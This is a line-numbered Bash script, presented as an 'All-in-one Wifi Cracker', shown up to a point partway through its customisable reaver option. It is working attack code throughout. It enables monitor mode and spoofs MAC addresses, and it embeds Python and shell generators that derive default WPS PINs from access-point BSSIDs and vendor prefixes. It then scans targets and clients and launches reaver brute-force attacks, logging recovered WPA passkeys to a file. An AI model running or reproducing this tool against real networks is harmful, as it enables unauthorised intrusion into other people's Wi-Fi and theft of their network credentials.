All-in-one Wifi Cracker

1. #!/bin/bash
2.  
3.  
4.  
5. RED=$(tput setaf 1 && tput bold)
6. GREEN=$(tput setaf 2 && tput bold)
7. STAND=$(tput sgr0)
8. BLUE=$(tput setaf 6 && tput bold)
9.  
10. while :
11. do
12.  
13. ###### Create scrypta storage folder if it doeasn't exist ######
14.  
15. if [ -d $HOME/scrypta ];
16. then
17. echo ""
18. else
19. mkdir $HOME/scrypta
20. mkdir $HOME/scrypta/temp
21. mkdir $HOME/scrypta/Captured_Handshakes
22. mkdir $HOME/scrypta/Client_Scans
23. fi
24.  
25. ###### Delete Missed Files In The Temp Directory ######
26.  
27. rm $HOME/scrypta/temp/*.txt &> /dev/null
28. rm $HOME/scrypta/temp/*.py &> /dev/null
29. rm $HOME/scrypta/temp/*.ivs &> /dev/null
30. rm $HOME/scrypta/temp/*.cap &> /dev/null
31. rm $HOME/scrypta/temp/*.xor &> /dev/null
32. rm $HOME/scrypta/temp/*.csv &> /dev/null
33. rm $HOME/scrypta/temp/*.netxml &> /dev/null
34. rm $HOME/scrypta/temp/arp-packet &> /dev/null
35. rm $HOME/scrypta/temp/*.sh &> /dev/null
36.  
37. ###### START OF: DETECT mon0 MAC ADDRESS AND THEN DISPLAY SYSTEM MODE STATUS ######
38.  
39. mon0mac=$(ip addr | grep "radiotap" | cut -c 30-46)
40.  
41. if [ -s $mon0mac ]
42. then
43. MonitorModeStatus=$(echo Networking Mode Enabled)
44. else
45. MonitorModeStatus=$(echo Attack Mode Enabled)
46. fi
47.  
48. ###### System Environment Options Menu ######
49. clear
50. echo $RED"#########################################"
51. echo "# $STAND scrypta $RED#"
52. echo "#########################################"
53. echo "# #"
54. echo "#$GREEN [1]$BLUE WiFi Adapter Selection $RED#"
55. echo "#$GREEN [2]$BLUE Enable Attack Or Networking Mode $RED#"
56. echo "#$GREEN [3]$BLUE Attack A WPS Enabled Access Point $RED#"
57. echo "#$GREEN [4]$BLUE Capture WPA/WPA2 Handshake $RED#"
58. echo "#$GREEN [5]$BLUE WEP Attacks $RED#"
59. echo "#$GREEN [6]$BLUE Attack Handshake.cap Files $RED#"
60. echo "#$GREEN [7]$BLUE Show Recovered Passkeys $RED#"
61. echo "#$GREEN [8]$BLUE Recovered Passkey Checker $RED#"
62. echo "# #"
63. echo "#########################################"
64. echo ""
65. echo "Chosen Interface$STAND: $wlanX"
66. echo $RED"System Mode$STAND: $MonitorModeStatus"
67. echo $RED"MAC address for mon0$STAND: $mon0mac"
68. echo ""
69. read -s -n1 -p $GREEN"Please choose an option?$STAND: " ChosenOption
70. echo
71. case $ChosenOption in
72.  
73. 1)
74. ###### [1] START OF: CHOOSE A WIFI ADAPTER ######
75.  
76. cd $HOME/scrypta/temp
77. clear
78. Presented_WiFi_Adapters=$(airmon-ng | grep "wlan" | cut -c 1-5 | nl -ba -w 1 -s ": ")
79. clear
80. echo $RED"Available WiFi Adapters.$STAND"
81. echo ""
82. echo "$Presented_WiFi_Adapters"
83. echo ""
84. read -s -n1 -p $GREEN"Please input the number of your chosen WiFi adapter:$STAND " grep_Line_Number
85. wlanX=$(echo $Presented_WiFi_Adapters | sed -n ""$grep_Line_Number"p" | cut -c 4-8)
86. echo ""
87. echo ""
88. echo $RED"You've chosen:$STAND $wlanX"
89. sleep 1
90. cd
91.  
92. ;;
93.  
94. ###### [1] END OF: CHOOSE A WIFI ADAPTER ######
95.  
96. 2)
97. ###### [2] START OF: ENABLE NETWORKING OR ATTACK MODE ######
98.  
99. clear
100. echo $RED"#########################################"
101. echo "# #"
102. echo "# $GREEN[1]$BLUE Enable Networking Mode $RED #"
103. echo "# $GREEN[2]$BLUE Enable Attack Mode $RED #"
104. echo "# $GREEN[0]$BLUE Return To Main Menu $RED #"
105. echo "# #"
106. echo "#########################################$STAND"
107. echo ""
108. read -s -n1 -p $GREEN"Choose an option, 1 or 2?:$STAND " option
109. if [[ $option == "1" ]]; then
110. clear
111. echo $RED"Putting the system into networking mode$STAND"
112. airmon-ng stop mon5 > /dev/null
113. airmon-ng stop mon4 > /dev/null
114. airmon-ng stop mon3 > /dev/null
115. airmon-ng stop mon2 > /dev/null
116. airmon-ng stop mon1 > /dev/null
117. airmon-ng stop mon0 > /dev/null
118. airmon-ng stop wlanX
119. echo $RED"Please wait...$STAND"
120. ifconfig $wlanX down
121. ifconfig $wlanX down
122. wlanFakeMAC=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
123. ifconfig $wlanX hw ether $wlanFakeMAC
124. ifconfig $wlanX up
125. sleep 1
126. service network-manager start
127. echo ""
128. echo $RED"Networking mode should now be enabled, A fake MAC address has also been set.$STAND"
129. sleep 3
130. fi
131.  
132. if [[ $option == "2" ]]; then
133. clear
134. echo $RED"Putting the system into attack mode$STAND"
135. echo $RED"Please wait...$STAND"
136. echo ""
137. airmon-ng stop mon5 > /dev/null
138. airmon-ng stop mon4 > /dev/null
139. airmon-ng stop mon3 > /dev/null
140. airmon-ng stop mon2 > /dev/null
141. airmon-ng stop mon1 > /dev/null
142. airmon-ng stop mon0 > /dev/null
143. ifconfig $wlanX down
144.  
145. read -s -n1 -p $GREEN"Would you like to disable processes that might cause issue's Y/n?.$STAND " KillProcesses
146. if [[ $KillProcesses == "Y" || $KillProcesses == "y" ]]; then
147. echo ""
148. echo $RED"Please wait...$STAND"
149. kill `pidof NetworkManager`
150. sleep 2
151. kill `pidof wpa_supplicant`
152. sleep 2
153. fi
154.  
155. ifconfig $wlanX up
156. sleep 1
157. airmon-ng start $wlanX
158. echo $RED"Please wait...$STAND"
159. sleep 1
160. ifconfig $wlanX down
161. sleep 1
162. ifconfig mon0 down
163. wlanMAC1=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
164. ifconfig $wlanX hw ether $wlanMAC1
165. echo ""
166. sleep 1
167. macchanger --mac $wlanMAC1 mon0 > /dev/null
168. ifconfig $wlanX up
169. ifconfig mon0 up
170. echo ""
171. echo $RED"MAC address for $wlanX:$STAND"
172. macchanger -s $wlanX
173. echo ""
174. echo $RED"MAC address for mon0:$STAND"
175. macchanger -s mon0
176. echo ""
177. echo $RED"A Random MAC address has been set,$STAND "$wlanX"$RED and$STAND mon0$RED should now have the same fake MAC address.$STAND"
178. echo ""
179. echo $RED"Attack Mode Should Now Be Enabled.$STAND"
180. sleep 3
181. fi
182.  
183. ;;
184.  
185. ###### [2] END OF: ENABLE NETWORKING OR ATTACK MODE ######
186.  
187. 3)
188. ###### [3] Attack A WPS Enabled Access Point ######
189. cd $HOME/scrypta/temp
190. clear
191. ############## Start Of Create WPSpin.py And easybox_wps.py ##############
192.  
193. ############## WPSpin.py ##############
194. echo '
195. import sys
196.  
197. VERSION = 1
198. SUBVERSION = 0
199.  
200. def usage():
201. print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
202. print "[*] Usage : python WPSpin.py 123456"
203. sys.exit(0)
204.  
205. def wps_pin_checksum(pin):
206. accum = 0
207.  
208. while(pin):
209. accum += 3 * (pin % 10)
210. pin /= 10
211. accum += pin % 10
212. pin /= 10
213. return (10 - accum % 10) % 10
214.  
215. try:
216. if (len(sys.argv[1]) == 6):
217. p = int(sys.argv[1] , 16) % 10000000
218. print "[+] WPS pin might be : %07d%d" % (p, wps_pin_checksum(p))
219. else:
220. usage()
221. except Exception:
222. usage()
223. ' > WPSpin.py
224.  
225. ############## easybox_wps.py ##############
226.  
227. echo '#!/usr/bin/env python
228. import sys, re
229.  
230. def gen_pin (mac_str, sn):
231. mac_int = [int(x, 16) for x in mac_str]
232. sn_int = [0]*5+[int(x) for x in sn[5:]]
233. hpin = [0] * 7
234.  
235. k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
236. k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
237. hpin[0] = k1 ^ sn_int[9];
238. hpin[1] = k1 ^ sn_int[8];
239. hpin[2] = k2 ^ mac_int[9];
240. hpin[3] = k2 ^ mac_int[10];
241. hpin[4] = mac_int[10] ^ sn_int[9];
242. hpin[5] = mac_int[11] ^ sn_int[8];
243. hpin[6] = k1 ^ sn_int[7];
244. pin = int("%1X%1X%1X%1X%1X%1X%1X" % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000
245.  
246. # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
247. # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
248. accum = 0
249. t = pin
250. while (t):
251. accum += 3 * (t % 10)
252. t /= 10
253. accum += t % 10
254. t /= 10
255. return "%i%i" % (pin, (10 - accum % 10) % 10)
256.  
257. def main():
258. if len(sys.argv) != 2:
259. sys.exit("usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n")
260.  
261. mac_str = re.sub(r"[^a-fA-F0-9]", "", sys.argv[1])
262. if len(mac_str) != 12:
263. sys.exit("check MAC format!\n")
264.  
265. sn = "R----%05i" % int(mac_str[8:12], 16)
266. print "derived serial number:", sn
267. print "SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c" % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])
268. print "WPS pin:", gen_pin(mac_str, sn)
269.  
270. if __name__ == "__main__":
271. main()
272. ' > easybox_wps.py
273.  
274. ############## End Of Create WPSpin.py And easybox_wps.py ##############
275.  
276. ############## Start Of Target Selection And Pin Generation ##############
277.  
278. clear
279. echo $RED"Scanning for WPS-enabled access points, press Ctrl+c on the wash screen to stop the scan and choose a target."$STAND
280. read -p $GREEN"Press [Enter] to launch the scan.$STAND"
281. xterm -geometry 111x24+650+0 -l -lf WashScan.txt -e wash -i mon0
282. sed -i ''1,6d';'$d'' WashScan.txt
283.  
284. ############## Start Of Loop Section ##############
285.  
286. while true
287. do
288.  
289. Presented_APs=$(cat WashScan.txt | awk '{ print $6 }' | nl -ba -w 1 -s ': ' | sed '$d')
290. clear
291. echo $RED"Available Access Points."$STAND
292. echo ""
293. echo "$Presented_APs"
294. echo ""
295. read -p $GREEN"Please input the number of your chosen target:$STAND " grep_AP_line_number
296.  
297. Chosen_AP_Line=$(cat WashScan.txt | sed -n ""$grep_AP_line_number"p")
298. AP_essid=$(echo $Chosen_AP_Line | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
299. AP_bssid=$(echo $Chosen_AP_Line | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
300. AP_channel=$(echo $Chosen_AP_Line | awk '{ print $2 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
301. PinMAC1=$(echo $AP_bssid | sed 's/://g' | cut -c 7-12)
302. PinMAC2=$(echo $AP_bssid | sed 's/://g' | cut -c 1-6)
303. WPSpin1=`python WPSpin.py $PinMAC1 | awk '{ print $7 }'`
304. WPSpin2=`python WPSpin.py $PinMAC2 | awk '{ print $7 }'`
305. easybox=`python easybox_wps.py $AP_bssid | grep "WPS pin" | cut -c 10-17`
306.  
307. ############## End Of Target Selection And Pin Generation ##############
308.  
309. ############## Start Of Choose A MAC Address Options ##############
310.  
311. clear
312. echo $RED"Please choose a MAC address option:$STAND"
313. echo $GREEN"[1]$BLUE = Auto Set A Random MAC address.$STAND"
314. echo $GREEN"[2]$BLUE = Input Any MAC Address You Want To Use.$STAND"
315. echo $GREEN"[3]$BLUE = Continue Without Changing The MAC Address.$STAND"
316. read -s -n1 -p $GREEN"Please choose 1, 2, or 3?$STAND: " option
317.  
318. if [[ $option == "1" ]]; then
319. clear
320. echo $RED"Auto Setting A Random MAC Address.$STAND"
321. echo $RED"Please wait..."$STAND
322. ifconfig $wlanX down
323. ifconfig $wlanX down
324. sleep 1
325. ifconfig mon0 down
326. wlanMAC2=`macchanger -r $wlanX | grep "New" | cut -c 16-32`
327. ifconfig $wlanX hw ether $wlanMAC2
328. echo ""
329. sleep 1
330. macchanger --mac $wlanMAC2 mon0
331. ifconfig $wlanX up
332. ifconfig mon0 up
333. echo ""
334. echo $RED"MAC address for$STAND $wlanX:"
335. macchanger -s $wlanX
336. echo ""
337. echo $RED"MAC address for$STAND mon0:"
338. macchanger -s mon0
339. echo ""
340. echo $RED"A Random MAC address has been set,$STAND $wlanX$RED and$STAND mon0$RED should now have the same fake MAC address."
341. echo ""
342. sleep 4
343. fi
344.  
345. if [[ $option == "2" ]]; then
346. clear
347. echo $RED"Set A User specified MAC Address.$STAND"
348. echo $RED"Please wait..."$STAND
349. ifconfig $wlanX down
350. ifconfig mon0 down
351. echo ""
352. echo $RED"Setting a random MAC address."$STAND
353. macchanger -r $wlanX
354. echo ""
355. read -p $GREEN"Input any mac address you want to use?.$STAND " SpecifiedInterfaceMAC
356. ifconfig $wlanX hw ether $SpecifiedInterfaceMAC
357. macchanger --mac $SpecifiedInterfaceMAC mon0
358. ifconfig $wlanX up
359. ifconfig mon0 up
360. echo ""
361. echo $RED"MAC address for$STAND $wlanX:"$STAND
362. macchanger -s $wlanX
363. echo ""
364. echo $RED"MAC address for$STAND mon0:"$STAND
365. macchanger -s mon0
366. echo ""
367. sleep 2
368. echo $RED"A User specified MAC Address has been set, $wlanX and $monX should now have the same fake MAC address."$STAND
369. echo ""
370. echo $RED"Attack Mode Should Now Be Enabled."$STAND
371. sleep 2
372. fi
373.  
374. if [[ $option == "3" ]]; then
375. echo ""
376. fi
377.  
378. ############## End Of Choose A MAC Address Options ##############
379.  
380. ############## Start Of Review Information ##############
381.  
382. clear
383. echo $RED"Review Information."$STAND
384. echo ""
385. echo $RED"You've chosen$BLUE essid$RED:$STAND $AP_essid"
386. echo $RED"You've chosen$BLUE bssid$RED:$STAND $AP_bssid"
387. echo $RED"You've chosen$BLUE Channel$RED:$STAND $AP_channel"
388. echo ""
389. echo $RED"Possible$BLUE WPS Pin1$RED:$STAND $WPSpin1"
390. echo $RED"Possible$BLUE WPS Pin2$RED:$STAND $WPSpin2"
391. echo $RED"Possible$BLUE easybox Pin$RED:$STAND $easybox"
392. ############## Start Of WPSPIN-1.3 Default Pin Generater ##############
393.  
394. ESSID=$(echo $AP_essid)
395. BSSID=$(echo $AP_bssid)
396.  
397. FUNC_CHECKSUM(){
398. ACCUM=0
399.  
400. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
401. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
402. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
403. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
404. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
405. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
406. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
407.  
408. DIGIT=`expr $ACCUM '%' 10`
409. CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`
410.  
411. PIN=`expr $PIN '+' $CHECKSUM`
412. ACCUM=0
413.  
414. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
415. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
416. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
417. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
418. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
419. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
420. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
421. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`
422.  
423. RESTE=`expr $ACCUM '%' 10`
424. }
425.  
426. CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
427.  
428. FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
429.  
430. MAC=$(echo $FINBSSID | tr -d ':')
431.  
432. CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
433.  
434. FINESSID=$(echo $ESSID | cut -d '-' -f2)
435.  
436. PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
437.  
438. CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
439.  
440. MACESSID=$(echo $PAREMAC$FINESSID)
441.  
442. STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
443.  
444. PIN=`expr 10 '*' $STRING`
445.  
446. FUNC_CHECKSUM
447.  
448. PINWPS1=$(printf '%08d\n' $PIN)
449.  
450. STRING2=`expr $STRING '+' 8`
451. PIN=`expr 10 '*' $STRING2`
452.  
453. FUNC_CHECKSUM
454.  
455. PINWPS2=$(printf '%08d\n' $PIN)
456.  
457. STRING3=`expr $STRING '+' 14`
458. PIN=`expr 10 '*' $STRING3`
459.  
460. FUNC_CHECKSUM
461.  
462. PINWPS3=$(printf '%08d\n' $PIN)
463.  
464. if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] && [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] && [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
465.  
466. then
467.  
468. CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
469.  
470. RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
471.  
472. STRING4=`expr $RAIZ '+' 7`
473.  
474. PIN=`expr 10 '*' $STRING4`
475.  
476. FUNC_CHECKSUM
477.  
478. PINWPS4=$(printf '%08d\n' $PIN)
479.  
480. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4 "
481. PIN4REAVER=$PINWPS4
482. else
483. case $CHECKBSSID in
484. 04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
485. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1
486. $RED"Other Possible Pin"$RED:$STAND $PINWPS2
487. $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
488. PIN4REAVER=$PINWPS1
489. ;;
490. 001915)
491. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
492. PIN4REAVER=12345670
493. ;;
494. 404A03)
495. echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
496. PIN4REAVER=11866428
497. ;;
498. F43E61 | 001FA4)
499. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
500. PIN4REAVER=12345670
501. ;;
502. 001A2B)
503. if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
504. then
505. echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
506. PIN4REAVER=88478760
507. else
508. echo -e "PIN POSSIBLE... > $PINWPS1"
509. PIN4REAVER=$PINWPS1
510. fi
511. ;;
512. 3872C0)
513. if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
514. then
515. echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
516. PIN4REAVER=18836486
517. else
518. echo -e "PIN POSSIBLE > $PINWPS1"
519. PIN4REAVER=$PINWPS1
520. fi
521. ;;
522. FCF528)
523. echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
524. PIN4REAVER= 20329761
525. ;;
526. 3039F2)
527. echo -e "several possible PINs, ranked in order>
528. 16538061 16702738 18355604 88202907 73767053 43297917"
529. PIN4REAVER=16538061
530. ;;
531. A4526F)
532. echo -e "several possible PINs, ranked in order>
533. 16538061 88202907 73767053 16702738 43297917 18355604 "
534. PIN4REAVER=16538061
535. ;;
536. 74888B)
537. echo -e "several possible PINs, ranked in order>
538. 43297917 73767053 88202907 16538061 16702738 18355604"
539. PIN4REAVER=43297917
540. ;;
541. DC0B1A)
542. echo -e "several possible PINs, ranked in order>
543. 16538061 16702738 18355604 88202907 73767053 43297917"
544. PIN4REAVER=16538061
545. ;;
546. 5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
547. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
548. PIN4REAVER=$PINWPS1
549. ;;
550. 002275)
551. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
552. PIN4REAVER=$PINWPS1
553. ;;
554. 08863B)
555. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
556. PIN4REAVER=$PINWPS1
557. ;;
558. 001CDF)
559. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
560. PIN4REAVER=$PINWPS1
561. ;;
562. 00A026)
563. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
564. PIN4REAVER=$PINWPS1
565. ;;
566. 5057F0)
567. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
568. PIN4REAVER=$PINWPS1
569. ;;
570. C83A35 | 00B00C | 081075)
571. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
572. PIN4REAVER=$PINWPS1
573. ;;
574. E47CF9 | 801F02)
575. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
576. PIN4REAVER=$PINWPS1
577. ;;
578. 0022F7)
579. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
580. PIN4REAVER=$PINWPS1
581. ;;
582. *)
583. echo -e $RED"Other Possible Pin$RED:$STAND $PINWPS1"
584. PIN4REAVER=$PINWPS1
585. ;;
586. esac
587. fi
588.  
589. ############## End Of WPSPIN-1.3 Default Pin Generater ##############
590.  
591. echo ""
592. echo $RED"MAC address for$STAND mon0:"$STAND
593. macchanger -s mon0
594. sleep 4
595.  
596. ############## End Of Review Information ##############
597.  
598. ############## Start Of Scan For Clients And Store Collected MAC Addresses Option ##############
599. echo ""
600. read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND " ClientScan
601.  
602. if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
603. xterm -geometry 111x24+650+0 -l -lf temp1.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
604. cat temp1.txt | tail -10 | sed 'N;$!P;$!D;$d' | sed -n '/STATION/,$p' >> ClientScan-$AP_bssid.txt
605. mv ClientScan-$AP_bssid.txt $HOME/scrypta/Client_Scans/ClientScan-$AP_bssid.txt
606. rm temp1.txt
607. echo ""
608. echo ""
609. echo $RED"Collected scan data is stored in$STAND ClientScan-$AP_bssid.txt $RED Location$STAND: $HOME/scrypta/Client_Scans"
610. echo ""
611. read -p $GREEN"Press [Enter] to continue.$STAND"
612. fi
613.  
614. if [[ $ClientScan == "N" || $ClientScan == "n" ]]; then
615. echo ""
616. fi
617. ############## End Of Scan For Clients And Store Collected MAC Addresses Option ##############
618.  
619. ############## Start Of Reaver Attacks And Store Recovered Passkey ##############
620.  
621. clear
622. echo $RED"Choose an attack option:"$STAND
623. echo $GREEN"[1]$BLUE = Reaver + Auto Generated WPS Pin"$STAND
624. echo $GREEN"[2]$BLUE = Reaver (Customisable Options)"$STAND
625. echo
626. read -s -n1 -p $GREEN"Please choose an option?$STAND: " yourch
627. echo
628. case $yourch in
629.  
630. 1)
631. clear
632. echo $RED"Choose a pin:"
633. echo $GREEN"[1]$BLUE WPS Pin1 = $WPSpin1"
634. echo $GREEN"[2]$BLUE WPS Pin2 = $WPSpin2"
635. echo $GREEN"[3]$BLUE EasyBox Pin = $easybox"
636. echo $GREEN"[4]$BLUE Other Pins = $PIN4REAVER"
637. read -s -n1 -p $GREEN"Please choose 1, 2, 3, or 4?$STAND: " PinOption
638.  
639. if [[ $PinOption == "1" ]]; then
640. clear
641. echo $RED"Reaver Attack Command:"$STAND
642. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv"
643. echo ""
644. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
645. clear
646. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
647. rm reaver.txt
648. echo ""
649. fi
650.  
651. if [[ $PinOption == "2" ]]; then
652. clear
653. echo $RED"Reaver Attack Command:"$STAND
654. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv"
655. echo ""
656. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
657. clear
658. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
659. rm reaver.txt
660. echo ""
661. fi
662.  
663. if [[ $PinOption == "3" ]]; then
664. clear
665. echo $RED"Reaver Attack Command:"$STAND
666. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv"
667. echo ""
668. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
669. clear
670. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
671. rm reaver.txt
672. echo ""
673. fi
674.  
675. if [[ $PinOption == "4" ]]; then
676. clear
677. echo $RED"Reaver Attack Command:"$STAND
678. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv"
679. echo ""
680. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
681. clear
682. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
683. rm reaver.txt
684. echo ""
685. fi ;;
686.  
687. 2)
688. clear
689. echo $RED"Current Reaver Attack Command:"$STAND
690. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
691. echo ""
692. read -p $GREEN"Please input any additional reaver options (eg: -vv):$STAND " ReaverOptions
693. echo ""
694. echo $RED"New Reaver Attack Command:"$STAND
695. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid $ReaverOptions"
696. echo ""
697. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
